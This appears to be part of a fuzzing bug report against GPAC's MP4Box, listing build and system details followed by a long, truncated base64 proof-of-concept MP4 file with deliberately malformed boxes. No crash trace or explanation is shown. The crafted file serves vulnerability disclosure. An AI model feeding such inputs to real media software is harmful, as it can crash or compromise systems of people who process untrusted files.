``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1647-gb6f68145e-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/home/aidai/fuzzing/gpac/ Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz poc base64 poc AAAAFHN0eXDoAwAFEHNzc21wNDEAACzTbW9vdgAAAGxtdmhkAAAAIkic2V9InNlhAAFfkAAfXZgA AQAAAQAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAACppb2RzAAAAABCAgIAZAE///w8B/w6AgIAEAAAABw6A gIAEAAAACAAACAN0cmFrAAAAXHRraGQAAAABSJzZX0ic2V8AAAABAAACAAAfT6AAAAAAAAAAAAAA AAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAABAAAAAALAAAACQAAAAAAefbWRp YQAAACBtZGhkAAAAAEic2V9InNlfAAFfkAAfT6AAAAAAAAAAIWhkbHIAAAAAAAAAAHZpZGUAAAAA AAAAAAAAAAAAAAAHVm1pbmYAAAAUdm1oZAAAAAEAAAAAAAAAAAAAACRkQ0NmAAAAHGRyZWYAAAAA AAAAAQAAAAx1cmwgAAAAAQAABxZzdGJsAAAAtnN0c2QAAAAAAAAAAQAAAKZtcDR2AAAAAAAAAAEA AAAAAAAAAAAAAAAAAAAAALAAkABIAAAASAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAGP//AAAAUGVzZHMAAAAAA4CAgD8AAQAEgICAMSARABVpAANQ4AADBcEFgICAHwAA AbADAAABtQkAAAEAAAABIADIiLqYYfQgsIJCgwcGgICAAQIAAAAYc3R0cwAAAAAAAAABAAABVgAA F3AAAAVsc3RzegAAAAAAAAAAAAABVgAAC+0AAAJhAAACeAAAApwAAAKWAAADxgAABAUAAARfAAAH ewAAB1cAAAsH///99gAAC7AAAAcwAAAHDwAAB0oAAAciAAAElgAABLoAAARsAAAENQAABJUAAAdb AAAG2QAAB4YAAAfUAAAH8gAACEgAAAAAAAAD3gAAD4kAAAS9AAAEvwAAAtYAAAL7AAADpQAABEgA AASAAAADrAAAG+AAAAcZAAAKywAAC3gAAAuGAAAHVAAABzAAAAazAAADywAABLcAAARtAAAE5wAA BOUAAAeNAAAGpQAABrwAAAbiAAAGmgAAByoAAAfxAAAHOAAAFJIAAATUAAAFLgAAAyEAAAMjAAAD KQAAAugAAANdAAAEswAAA9oAAAQkAAAG4gAABo0AAArUAAALUgAACx4AAAvxAAAHzgAABzcAAAbk AAADtAAAA/UAAAQ7AAAEPwAABNUAAAQ+AAAERgAABrcAAAaKAAAHDwAAFWkAAAgZAAAElQAABHAA AAPWAAADtQAABAUAAAQ7AAAEKAAABDIAAAb4AAAGdwAABqEAAAbzAAALOQAAC5sAAAeyAAAIDQAA BzIAAAdqAAAELwAAA/sAAAPHAAAESgAAA0AAAAbqAAAGhgAABssAAAb+AAAHhQAAFMEAAAfHAAAH owAAA+AAAAP/AAADEgAAAzsAAAMjAAAEkAAABC8AAARkAAAHzQAABxoAAAbtAAAKsQAAC5EAAAcD AAAHcQAAB+QAAAdjAAAHVgAAA7AAAAO8AAAEOgAABEsAAASVAAAHTQAAByYAAAalAAAHHQAAFRMA AAeYAAAEmgAABKUAAAKQAAADGAAAA0cAAAP7AAADpAAAA84AAAexAAAICgAAB0kAAAtoAAALAQAA BrcAAAcnAAAHPAAAB6UAAAeGAAAD6QAAA3AAAAOJAAADngAABqUAAAdMAAAHWAAABm8AAAbLAAAG mQAAFPsAAAftAAAD/AAABBoAAAPQAAAENwAABEYAAAQJAAAEYQAABCgAAAeIAAAH2wAAB0UAAAb1 AAAHoQAABqQAAAYqAAAG+gAAB1MAAAcYAAAHMgAABxsaAAbQAAAGogAABrwAAAbpAAAHYwAABxQA AAQ0AAAEOAAAFPsAAAQbAAADrAAAAsMAAAKtAAACswAABJ4AAAQtAAAHOgAABsAAAAcNAAAGqwAA BqAAAArRAAAMBQAAB1EAAAZSAAAGSAAABvEAAAbCAAAD1QAABH4AAATCAAAEugAACBQAAAeQAAAH AQAABycAAAbqAAAG7AAAFNYAAAS3AAAFZQAAAzgAAAMVAAAEGgAABRsAAAVyAAAFNgAABXQAAAYB AAAFYQAABUMAAAVUAAAKfwAACg8AAAnQAAAJTAAABNYAAATwAAAElAAABGoAAARwAAAENwAABKkA AAlmAAAIgAAACJ8AAAkpAAAJLwAAEegAAAW2AAAD9wAAA9oAAAJBAAAB6QAAA4YAABXwAAAEmwAA BjgAAAZEAAAGAQAACaAAAAnYAAAIuwAAB1MAAAeFAAAHgQAABNkAAAS8AAAETwAAAz0AAAayAAAH YAAAB7UAAAi0AAAJVwAACG0AAAgjAAAE+QAAEScAAAUyAAADfQAAAwkAAAHsAAADAgAAA4gAAATt AAAF7QAABOQAAARhAAAIswAACLcAAAnHAAAJWQAACLoAAAmwAAAH4wAAA7oAAAPjAAAEHgAABEEA AARBAAAIKwAAB5IAAAcnAAAHRQAACAoAAAe0AAAIiQAAEkEAAAYmAAAFdgAABK0AAAA8AAAAPAAA AhsAAALqAAAC0QAABWUAAAhfAAAKnQAAAChzdHNjAAAAAAAAAAIAAAABAAAADwAAAAEAAAAXAAAA DAAAAAEAAABsc3RjbwAAAAAAAAAXAAA2/gAAzCUAAWSSAAIEswACm90AAzRvAAPNZAAEbHsABQbL AAWkHgAGPwwABuG3AAd3mAAIFTYACLHgAAlSqQAJ6xgACoORAAsnxAALwLEADF+4AAz3nQANlFsA AABAc3RzcwAAAAAAAAAMAAAAAQAAAB8AAAA9AAAAWwAAAHkAAACXAAAAtQAAANMAAADxAAABDwAA AS0AAAFLAAAJM3RyYWsAAABcdGtoZAAAAABInNlfSJzZXwAAAAIAAAAAAB9PoAAAAAAAAAAAAAAA AAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAByVtZGlh AAAAIG1kaGQAAAAASJzZX0ic2V8AAV+QAB9PoAAAAAAAAAAhaGRscgAAAAAAAAAAaGludAAAAAAA AAAAAAAAAAAAAAbcbWluZgAAABxobWhkAAAAAAXABAQAA1mAAAMVywAAAAAAAAAkZGluZgAAABxk cmVmAAAA5wAAAAEAAAAMdXJsIAAAAAEAAAaUc3RibAAAADRzdHNkAAAAAAAAAAEAAAAkcnRwIAAA AAAAAAABAAEAAQAABbQAAAAMdGltcwABX5AAAAAYc3R0cwAAAAAAAAABAAABVgAAF3AAAAVsc3Rz egAAAAAAAAAAAAABVgAAAJMAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8 AAAAWAAAAFgAAAA8AAAAPAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwA AAA8AAAAPAAAADwAAAA8AAAAIAAAAFgAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAA ADwAAAA8AAAAPAAAAFgAAABYAAAAPAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAA PAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAg AAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAADwAAABYAAAAPAAAADwAAAA8AAAAIAAAACAA AAAgAAAAIAAAACAAAAAgAAAAIAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAIAAAACAAAAAgAAEAIAAA ACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAAFgAAAA8AAAAPAAAADwAAAA8AAAA IAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAPAAAACAAAAAg AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAAFgAAAA8AAAAPAAAADwA AAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAIAAi ACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAA PAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8 AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPBUAHDwAAAA8CwAAPAAAADwA AAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAAgAAAAIAAA AHT/8wAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAA WAAAADwAAAA8AAAAPAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAADwAAAA8AAAAPFSoXNaITOVt OoaTBlqWvPjPRJE+4WEfmmqnBE4AAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAIAAAACAA AAAgAAAAPAAAADwAAAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAAB//3wA8AQAAPAAA ADwAAAA8AAAAPAAAAHQAAAA8AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAP/gIAAAADwAAAA8AAAA PAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8 AAAAPAAAADwAAAA8AAAAIAAAAHQAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAACAA AAAgAAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAA ADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAlQAAACAAAAAgAAAAIAAAACAAAAAgAAAA IAAAACAAAAA8AAAAPAAAAChzdHNjAAAAAAAAAAIAAAABAAAADwAAAAEAAAAXAAAADAAAAAEAAABs c3RjbwAAAAAAAAAXAAAAAQAAyUkAAWGaAAIBuwACmTkAAzGTAAPKiAAEaWcABQPvAAX9CgAGPKIA Bt6jAAd0vAAIEeoACK7MAAlPlQAJ6KwACoDRAAskzAALvbkADFz4AAz0pQANkjMAAABAc3RzcwAA AAAAAAAMAAAAAQAAAB8AAAA9AAAAWwAAAHkAAACXAAAAtQAAANMAAADxAAABDwAAAS0AAAFLAAAA FHRyZWYAAAAMaGludAAAAAEAAAGWdWR0YQAAAMxobnRpAAAAxHNkcCBtPXZpZGVvIDAgUlRQL0FW UCA5Ng0KYT1ydHBtYXA6OTYgTVA0Vi1FUy85MDAwMA0KYT1jb250cm9sOnRyYWNrSUQ9Mg0KYT1t cGVnNC1lc2lkOjENCmE9Zm10cDo5NiBwcm9maWxlLWxldmVsLWlkPTE7IGNvbmZpZz0wMDAwMDFi MDAzMDAwMDAxYjUwOTAwMDAwMTAwMDAwMDAxMjAwMGM4ODhiYTk4NjFmNDIwYjA4MjQyODMwNzsN CgAAAMJoaW5mAAAAEHRycHkAAAAAAAjK6wAAABBudW1wAAAAAAAAAjAAAAAQdHB5bAAAAAAACLCr AAAAEG1heHIAAAPoAABrMAAAABBkbWVkAAAAAAAIsIwAAAAQZGltbQAAAAAAAAAAAAAAEGRyZXAA AAAAAAAAAAAAAAx0bWluAAAAAAAAAAx0bWF4AAAAAAAAAAxwbWF4AAAFwAAAAAxkbWF4AAAXcAAA ABpwYXl0AAAAYA1NUDRWLUVTLzkwMA8wAAACdnVkdGEAAAJuaG50aQAAAmZydHAgc2RwIGE9aXNt YS1jb21wbGlhbmNlOjEsMS4wLDENCmE9bXBlZzQtaW9kOiAiZGF0YTphcHBsaWNhdGlvbi9tcGVn NC1pb2Q7YmFzZTY0LEFvAAEAAE1BVC8vL0R3SC9BNENBZ2dnQUIwRGtaR0YwWVRwaGNIQnNhV05o ZEdsdmJpOXRjR1ZuTkMxdlpDMWhkVHRpWVhObE5qUXNRVmxEUVdkUmEwSm5TVU5CVFZGTFprRTBR MEZuUTI5QlFsRkJSV2RKUTBGR1JVRldRVUZGYTBGQlIwTTBRVUZDWlVnd1JtZEpRMEZCYUVsUlFt OURRV2RCYTBKQlFVRkJRVUZCUVVGQlFVSm5TVU5CVkdkVlprRTBRMEZuUldOQlFWRkJSV2RKUTBG TlUwRlNRVUpXY0VGQlRsRTBRVUZFUW1ORlJtZEpRMEZJZDBGQlFXSkJSRUZCUVVKMFVXdEJRVUZG UVVGQlFVSkpRVVJKYVV4eFdWbG1VV2R6U1VwRFozZGpSMmRKUTBGRFVVVkJRVUZCUVVGQlFVRkJR VDA5QklDQWdBMEJCUUFBQUFBQUFBQUFBQVBBQm9DQWdBa0JBQUFBQUFBQUFBQURnSUNBYUlBSVFE NWtZWFJoT21Gd2NHeHBZMkYwYVc5dUwyMXdaV2MwTFdKcFpuTXRZWFU3AAAAAVpUWTBMSGRDUVZO blZFRnhRbGhLUUVKSmFGRlNVVlV2UTRFOVBRU0FnSUFWQWcwQUFBQUFBQUFBQUFBQUFBV0FnSUFE QUFCQUJvQ0FnQWtCQUFBQUFBQUFBQUE9Ig0KAAAReHRyYWsAAABcdGtoZAAAAAFInNlhSJzZYQAA AAcAAAAAAB9dmAAAAAAAAAAAAAAAAAEAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAA AEAAAAAAAAAAAAAAAAAAERRtZGlhAAAAIG1kaGQAAAAASJzZYUic2WEAAKxnAA9gAAAAAAAAAAAh aGRscgAAAAAAAAAAc291bgAAAAAAAAAAAAAAAAAAABDLbWluZgAAABBzbWhkAAAAAAAAAAAAAAAk ZGluZgAAABxkcmVmAAAAAAIAAAEAAAAMdXJsIAAAAAEAABCPc3RibAAAAGdzdHNkAAAAAAAAAAEA AABXbXA0YQAAAAAAAAABAAAAAAAAAAAAAgAQAAAAAKxEAAAAAAAzZXNkcwAAAAADgICAIgAFAASA gIAUQBUAASQAAYLgAAF4fQWAgIACEhAGgICAAQIAAAAYc3R0cwAAAAAAAAABAAAD2AAABAAAAA90 c3RzegAAAAAAAAAAAAAD2AAAAQ4AAMmDqW/YZRQAAR4AAAEbAAABGgAAARQAAAEaAAABFAAAAREA AAEXAAABGAAAAR0AAAEfAAABHQAAARwAAAEOAAABGgAAAR4AAAEeAAABGAAAARQAAAESAAABCgAA ARUAAAEcAAABFwAAARgAAAEbAAABGgAAARoAAAENAAABFAAAAR4AAAEfAAABIQAAAR8AAAERAAAB GQAAARwAAAEjAAABHwAAAR4AAAEbAAABHgAAARYAAAEUAAABGAAAARUAAAEYAAABHQAAAQkAAAEc AAABGgAAAREAAAEcAAABHQAAAR0AAAEfAAABFwAAARgAAAEYAAABHAAAARQAAAERAAABDgAAARsA AAEcAAABEQAAARIAAAEeAAABGwAAAR4AAAEhAAABHAAAARsAAAEWAAABGwAAARoAAAEdAAABFwAA AR8AAAEaAAABGgAAARwAAAEaAAABGAAAARsAAAEWAAABHAAAARcAAAEbAAABGAAAAR8AAAEZAAAB DQAAARcAAAEZAAABFwAAARUAAAEVAAABDgAAAR0AAAEiAAABIAAAASAAAAEdAAABGAAAAR8AAAEa AAABIgAAARgAAAEdAAABGQAAAR0AAAEfAAABGgAAASAAAAEZAAABHQAAARIAAAEdAAABHgAAARYA AAETAAABGgAAARQAAAEdAAABFgAAARwAAAEQAAABGAAAEAAAAAEcAAABFQAAARUAAAETAAABHAAA ARQAAgEZAAABFQAAAR0AAAEeAAABFwAAARwAAAEgAAABFgAAAR8AAAEfAAABIQAAASEAAAEfAAAB GwAAARsAAAEfAAABHgAAARkAAAEdAAABFAAAARsAAAEcAAABGwAAARoAAAEdAAABDwAAARsAAAEX AAABEAAAARgAAAEbAAABFQAAARkAAAEcAAABFwAAARcAAAEVAAABFwAAAR0AAAEYAAABHgAAAQ8A AAEfAAABIQAAAR0AAAEcAAABHAAAARwAAAEeAAABGwAAgRwAAAEaAAABIAAAASAAAAEdAAABHwAA AR4AAAEdAAABHgAAARgAAAEdAAABGwAAARwAAAEbAAABEwAAAQ8AAAESAAABFgAAAQoAAAERAAAB HgAAARgAAAEaAAABGQAAASAAAAEcAAABEwAAARQAAAESAAABFAAAAR4AAAEhAAABGgIAAR0AAAEh AAABIwAAAR0AAAEgAAABHgAAAR0AAAEiAAABHQAAARsAAAEZAAABHQAAARYAAAEgAAABHAAAARoA AAEgAAABGgAAARsAAgEfAAARGQAAAR0AAAESAAABHgAAAQcAAAEJAAABHgAAAR4AAAEdAAABGgAA AQ8AAAEeAAABFgAAARwAAAEfAAABGgAgARcAAAEXAAABHQAAARsAAAEVAAABFQAAAQwAAAETAAAB GwAAASAAAAEgAAABEQAAAQ8AAAEfAAABIwAAAR8AAAEiAAABFAAAARYAAAEMAAABFwAAAR8AAAEf AAABIQAAARwAAAEbAAABGAAAAR8AAAEZAAABCwAAARwAAAEeAAABHAAAARwAAAEdAACAAAAAAREA AAEbAAABFAAAAR0AAAEaAAABHQAAAR0AAAEPAAABGgAAARsAAAEZ+wABHgAAARkAAAEdAAABHwAA ARoAAAEaAAABGgAAAR4AAAEgAAABHQAAAR8AAAEfAAABAQAAAR4AAAEeAAABHAAAARwAAAEcAAAB FQAAARgAAAEQAAABFAAAARYAAAEbAAABHAAAARwAAAEeAAABHQAAARwAAAEXAAABFwAAARwAAAEU AAABGgAAARQAAAEYAAABGQAAASIAAAEQAAABIgAAARQAAAEfAAABEwAAARkAAAEeAAABGAAAAR0A AAEaAAABHQAAARMAAAEdAAABGQAAARsAAAENAAABEQAAAR0AAAEXAAABHAAAARYAAAEWAAABFQAA AQsAAAEfAAABHwAAARcAAAEJAAABHQAAAR0AAAEZAAABFAAAAR0AAAEZAAABDwAAARgAAAEgAAAB FAAAARQAAAEaAAABIAAAASAAAAEeAAABHAAAARcAAAEfAAABGgAAARoAAAEeAAABGAAAAR4AAAEf AAABHgAAARIAAAEZAAABFgAAAR0AAAEcAAABHAAAASIAAAEPAAABGAAAAQ8AAAEZAAABDgAAARkA AAEaAAABHQAAARgAAAESAAABGQAAARYAAAEdAAABGgAAAR4AAAEfAAABHwAAAR8AAAEZAAABHQAA ASAAAAEhAAABHwAAARwAAAEaAAABIAAAARgAAAETAAABHAAAASAAAAERAAABEwAAARYAAAEYAAAB GgAAAR0AAAEbAAABHgAAAQsAAAEgAAABHQAAARYAAAEeAAABHAAAARIAAAEXAAAFHwAAARwAAAEd AAABHgAAASAAAAEhAAABIAAAASAAAAEfAAABHQAAAR8AAAEgAAABHQAAASEAAAEfAAABGQAAARoA AAEcAAABGAAAARsAAAEdAAABFwAAAREAAAEaAAABIQAAAR8AAAENAAABGwAAARkAAAEYAAABEgAA ARkAAAEeAAABHQAAASQAAAEdAAABHwAAARoAAAEUAAABHQAAARcAAAEbAAABHwAAASEAAAEcAAAB GQAAARYAAAEUAAABGwAAAR4AAAEgAAABGwAAASAAAAEUAAABEwAAAR8AAAEYAAABFQAAAR0AAAEV AAABHQAAAREAAAEYAAABGgAAARsAAAERQIsKvp74lJk+A5kBPm1kSdGhpIB4w10cddYI+Fi4MOE4 vCjzneNA6i7vGcvGU8RofX0cCnn+EiyRgwOLzh0Ky1wj4smSraUCAa1bjAGai6lLGzOUslD3Ikgv UzEnE4DuvCnZeiP2jvLtAt5oaL9DsE/eNQR2xGtrUmgYERtgkzy+Y1gMOaIqCascC42I/+c3qJSu gGDtvOa1n7bNWHKsdzfYOnxpr1y81I1V20fAYx28YsqXWOiCOgYZ50LwQ7rqLf2T2yXLq/KqwfJ6 z9To7mK+UnUtfArRGTzxfAJz1kT7FJ/64EdBmvfyttNeYnhGoMaHgGy8RFCsDvO6CEXQtVKMTqVn kAU0Lu0sLSitDY18sARPlZY3EjSJEDHPRmKKICcODfHkojoGgb8Od4NhwwKqusHxnnDIjYhkzqYE sEYI4IEAacCnp27hawV6TBuKGVlkmsNNJhNRDrQdBgbh8R/GwYq3gKvsLRh/zcYo9jfQR6SgVbob Rhva2NWwmIUAAAG2UAMcEYx83ubNzRHHYLJORNHToz0CLg5PPTAvOxbEfsK8JXJ84GhoVXV5Rp1M FYj+B+2CeNgvaayuB3BQ4Y8HBTU4hANaDoEYYBkI/h6A////gWcHsmRn9k8w3qy0ltZUThvPM3yn vEwHFAjW9A3W9AkYrgp62sDmLYBjMbV5P+/ecT3iLAYqXLH9bSS81rc63ubMQ9mu7xJyrLxRAVTL vaDEiOvEfwo5qTNSlD+zOMJikb9IGlEbGzc6wg62op3vWi0cJmypzRKI8PgWodiGDEKgFMomLclj a1WXTAxv6Zhvl32FmsMZpEC0CnyBfgOEHBfQcfpoaOT0QMIaAYqLPYl1IWtIN6f7E9M/ZSh6lJBH rjcNRN14MUrdwQRcn0chfRqFPbWaaKOh3hkR5+rlqS8TtjSoOFm7Eec3vrSf+gW3Iv5HihvUpiKG 2xaeEf0tZB3BoITUZEbU/+9HW6zXbPzUDHGcLb2dJLuYUo0ojcXPzqcYCP6H5WgwhouSssIWFxQu IPAkxwU2ZBAJwW3S0OgSfszcbggMXWmhlcc4FNqeizI1dn9aoGL/d7o75E3Yom0GO3UcyJhvKvsy 3CH/rO37NHXo3edrFz11PdjgYrBGRma0ZCn+7VSNZOI2d1jV28hoRaze3Sgq0GIBFwAAARoAAAEU AAABEgAAAREAAAEVAAABGwAAARoAAAESAAABCAAAAQYAAAEUAAABGAAAAR8AAAEMAAABEQAAARwA AAEgAAABIAAAAR0AAAEfAAABHwAAASEAAAERAAABHAAAASIAAAEfAAABHgAAAR8AAAEgAAABIAAA ARQAAAEgAAABFwAAARkAAAEbAAABGwAAARIAAAEPAIABHQAAAAAAAAEZAAABHQAAARsAAAEJAAAB HAAAAQoAAAEcAAABDgAAARoAAAEcAAABGwAAARcAAAEWAAABGQAAASAAAAEVAAABEwAAAR0AAAEU AAABDgAAAR4AAAEeAAABHAAAARwAAAEaAAABHgAAAR0AAAEgAAABHwD/6xwAAAEfAAABFQAAAR0A AAEdAAABGQAAARwAAAEdAAABGwAAARoAAAEcAAABHgAAAR4AAAEAAAAhAAAAAQAAABxzdHNjAAAA AAAAAAEbAAABHQAAARwAAAEgAAABGwAAAR4AAAEeAAABGwAAARUAACIWAAABGwAAASQAAAEhAAAB GwAAARsAAAEgAAABHQAAAR0AAAEdAAABIAAAAR4AAAEbAAABGwAAARkAAAEdAAABHgAAARUAAAEc AAABHwAAARkAAAEfAAABFgAAARMAAAEaAAABGAAAARsAAAEaAAABGgAAAR4AAAEfAAABGAAAARkA AAETAAABHAAAARoAAAEZAAABGQAAARIAAAEdAAABIQAAAR8AAAEeAAABGwAAASIAAAEc5QABHgAA AR0AAAEhAAABIwAAARwAAAEgAAABHQAAAR8AAAEYAAABFgAAAR4AAAERAAABCwAAARsAAAENAAAB FwAAAR8AAAEPAAABFQAAARsAAAEgAAABEQAAAQ4AAAEWAAABFgAAARIAAAEYAAABFgAAARYAAAEb AAABFAAAAR0AAAEIAAABGQAAARsAAAEbAAABFQAAARoAAAEhAAABHQAAARIAAAEbAAABHAAAAR0A AAEaAAABHQAAARoAAAEeAAABHAAAARoAAAEhAAkBHgAAAR4AAAEhAAABHhAAARoAAAEcAAABHQAA AR8AAAEdAAABHgAAARcAAAEdAAABFQDrARwAAAETAAABFwAAARwAAAEVAAABFQAAARUAAAEcAAAB GAAAARYAAAELAAABGAAAARsAAAEaAAABGwAAARcAAAEbAAABGgAAARkAAAEXAAABFAAAARQAAAEX AAABCgAAAR0AAAEcAAABGwAAARoAAAEiAAABGgAAARMAAAEZAAABFAAAAQ8AAAEdAAABFgAAARwA AAEOAAABFgAAARYAAAEUAAABDwAAAChzdHNjAAAAAAAAAAIAAAABAAAALAAAAAEAAAAXAAAAEAAA AAEAAABsc3RjbwAAAAAAAAAXAACY3wABKpEAAcqXAAJiDgAC+mkAA5MzAAQyTAAEzKoABWntAAYF ewAGpzEABz2YAAfaswAId7AACRi4AAmxuAAKSbgACu2tAAuGHgAMJYYADL22AA1clwAN3GEAAAPD dHJhawAAAFx0a2hkAAAAAEic2WFInNlhAAAABgAAAAAAHz9AAAAAAAAAAAAAAAAAAAAAAAABAAAA AAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAABiW1kaWEAAAAgbWRoZAAA AABInNlhSJzZYQAArEQAD1AAAAAAAAAAACFoZGxyAAAAAAAAAABoaW50AAAAAAAAAAAAAAAAAAAA AUBtaW5mAAAAHGhtaGQAAAAABbUFmAABlcAAAYF7AAAAAAAAACRkaW5mAAAAHGRyZWYAAAAAAAAA AQAAAAx1cmwgAAAAAQAAAPhzdGJsAAAANHN0c2QAAAAAAAAAAQAAAB9ydHAgAAAAAAAAAAEAAQAB AAAFtAAAAAx0aW1zAACsRAAAABhzdHRzAAAAAAAAAAEAAADEAAAUAAAAABRzdHN6FQAAAAAAAMAA AADEAAAAKHN0c2MAAAAAAAAAAgAAAAEAAAAJAAAAAQAAABYAAAAHAAAAAQAAAGhzdGNvAAAAmAAA ABYAACzvAAFa2gAB+vsAApJ5AAMq0wADw8gABGKnAAT9LwAFmkoABjXiAAbX4wAHbfwACAsqAAio DAAJSNUACeHsAAp6EQALHgwAC7b5AAxWOAAM7eUADYzzAAAAFHRyZWYAAAAMaGludAAAAAUAAAHC dWR0YQAAAPJobnRpAAAA6nNkcCBtPWF1ZGlvIDAgUlRQL0FWUCA5Nw0KYT1ydHBtYXA6OTcgbXBl ZzQtZ2VuZXJpYy80NDEwMA0KYT1jb250cm9sOnRyYWNrSUQ9Ng0KYT1tcGVnNP//c2lkOjUNCmE9 Zm10cDo5NyBzdHJlYW10eXBlPTU7IHVyb2ZpbGUtbGV2ZWwtaWQ9MTU7IG1vZGU9QUFDLWhicjsg Y29uZmlnPTEyMTA7IFNpemVMZW5ndGg9MTM7IEluZGV4TGVuZ3RoPTM7IEluZGV4RGVsdGFMZW5n dGg9MzsgUHJvZmlsZT0xOw0KAAAAyGhpbmYAAAAQdHJweQAAAAAABEh7AAAAEG51bXAAAAAAAAAA xAAAABB0cHlsAAAAAAAEP0sAAAAQbWF4cgAAA+gAADK4AAAAEGRtZWQAAAAAAAQ2GwAAABBkaW1t AAAAAAAACTAAAAAQZHJlcAAAAAAAAAAAAAAADHRtaW4AAAAAAAAADHRtYXgAAAAAAAAADHBtYXgA AAW1AAAADGRtYXgAABQAAAAAIHBheXQAAABhE21wZWc0LWdlbmVyaWMvNDQxMDAAAAGxgHJhawAA AFx0a2hkAAAAAUic2WFInNlhAAAABwAAAAAAAABaAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAA AAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAABMW1kaWEAAAAgbWRoZAAAAABInNlh SJzZYQAAA+gAAAABAAAAAAAAACFoZGxyAAAAAAAAAABvZHNtAAAAAAAAAAAAAAAAAAAAAOhtaW5m AAAADG5taGQAAAAAAAAAJGRpbmYAAAAcZHJlZgAAAAAAAAABAAAADHVybCAAAAABAAAAsHN0YmwA AABMc3RzZAAAAAAAAAABAAAAPG1wNHMAAAAAAAAAAYAAACxlc2RzAAAAAAOAgIAbAAcABICAgA0B BQAAIQAAAQgAAAEIBoCAgAECAAAAGHN0dHMAAAAAAAAAAQAAAAEAAAABAAAAFHN0c3oAAAAAAAAA IQAAAAEAAAAcc3RzYwAAAAAAAAABAAAAAQAAAAEAAAABAAAAFHN0Y28AAAAAAAAAAQAAyRgAAAAc dHJlZgAAABRtcG9kAAAABQAAAAEAAAAIAAABnXRyYWsAAABcdGtoZAAAAAFInNlhSJzZYQAAAAgA AAAAAAAAWgAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAA AAAAAAAAAAAAAAAAATltZGlhAAAAIG1kaGQAAAAASJzZYUic2WEAAAPoAAAAAQAAAAAAAAAhaGRs cgAAAAAAAAAAc2RzbQAAAAAAAAAAAAAAAAAAAADwbWluZgAAAAxubWhkAAAAAAAAACRkaW5mAAAA HGRyZWYAAAAAAAAAAQAAAAx1cmwgAAAAAQAAALhzdGJsAAAAVHN0c2QAAAAAAAAAAQAAAERtcDRz AAAAAAAAAAEAAAA0ZXNkcwAAAAADgICAIwAIAASAgIAVAA0AABAAAACAAAAAgAWAgIADAxZABoCA gAECAAAAGHN0dHMAAAAAAAAAAQAAAAEAAAABAAAAFHN0c3oAAAAAAAAgEAAAAAEAAAAcc3RzYwAA AAAAAAABAAAAAQAAAAEAAAABAAAAFHN0Y28AAAAAAAAAAQAAyTkADcDmbWRhdAABAAAAAAAAAOEA AAAAAAsBAgBQAAAAAAAAAAAAAAAAAQIIcAAAAAAAAAAAAAAAAAECCGgAAAAAAAAAAAAAAAABAgjQ AAAAAAAAAAAAAAAAAQII8AAAAAAAAAAAAAAAAAECCNgAAAAAAAAAAAAAAAACAAEOAAAAAQAAAAAA AQABAgABDQAAAAIAAAAAAAEAAQIAARoAAAADAAAAAAABAAECAAEeAAAABAAAAAAAAQABAgABGwAA 